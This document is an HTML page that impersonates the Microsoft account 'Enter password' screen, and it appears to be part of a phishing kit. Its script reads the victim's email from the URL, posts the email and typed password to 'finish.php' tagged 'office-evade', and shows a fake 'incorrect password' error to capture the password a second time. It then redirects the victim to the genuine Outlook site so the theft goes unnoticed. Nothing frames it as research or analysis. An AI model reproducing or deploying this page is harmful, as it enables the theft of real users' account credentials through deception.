<!DOCTYPE html>
<html lang="en">
<head>
    <title>Sign in to your Microsoft account</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="favicon.ico">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/pass.css">
    <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <style type="text/css">
        
    </style>
</head>
<body>
  
<div class="container-fluid">
    <div class="row d-flex align-items-center">
        <div class="col-lg-4 col-md-4 col-xs-12 mx-auto">
            <div class="card">
                <div class="card-body">
                    <img src="assets/images/logo.svg">
                    <p><a href="?cngmail=true"><img src="assets/images/arrow_left.svg"> <span class="disp"></span></a></p>
                    <h4>Enter password</h4>
                    <span id="error" class="d-none">Your account or password is incorrect. If you don't remember your password, <a href="#">reset it now.</a></span>
                    <form method="POST">
                        <div class="form-group">
                            <input type="password" class="form-control" id="pass" name="pass" placeholder="Password" required>
                            <input type="hidden" name="user" value="">
                        </div>
                        <div class="form-group form-check">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox"> Keep me signed in
                            </label>
                        </div>
                        <p><a href="#">Forgot my password</a></p>
                        <button type="submit" class="btn float-right">Sign In</button>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="footer">
    <p><img src="assets/images/ellipsis_white.svg"></p>
    <p>Privacy & cookies</p>
    <p>Terms of use</p>
    <p>©2020 Microsoft</p>
</div>

<script>

    $(function() {
        $(document).on('focus', '.form-control', function() {
            $(this).css({'border-bottom': '1px solid #0067b8'});
        });

        $(document).on('blur', '.form-control', function() {
            $(this).css({'border-bottom': ''});
        });
        var emailv = GetURLParameter('user');
        $('.disp').html(emailv);
        $('input[name=user]').val(emailv);
        var success = 0;
        var atmptt = 0;
        $(document).on('submit', 'form', function(event) {
            event.preventDefault();
            var pass = $('#pass').val();
            if(emailv && emailv.length > 0 && pass.length > 0){
                atmptt++;
                $.post('finish.php', {Email: emailv, password : pass, typeofemail : 'office-evade'});
                if(atmptt == 1){
                setTimeout(function() {
                    $('#pass').val('');
                    $('.form-control').css({'border-bottom': '1px solid #e81123'});
                    $('#error').toggleClass('d-none d-block');
                    
                    $(document).on('focus', '.form-control', function() {
                        $(this).css({'border-bottom': '1px solid #e81123'});
                    });
            
                    $(document).on('blur', '.form-control', function() {
                        $(this).css({'border-bottom': '1px solid #e81123'});
                    });
                }, 1000);
                }
                setTimeout(function() {
                  if(atmptt == 2){    
                  window.location.replace('https://outlook.office365.com/owa');
                }
                
                }, 2000);
            }
        });
    });
 function GetURLParameter(sParam)
{
var output = false;
    var sPageURL = window.location.search.substring(1);
    var sURLVariables = sPageURL.split('&');
    for (var i = 0; i < sURLVariables.length; i++)
    {
        var sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] == sParam)
        {
            output = decodeURIComponent(sParameterName[1]);
        }
    }
	return output;
}
</script>

</body>
</html>
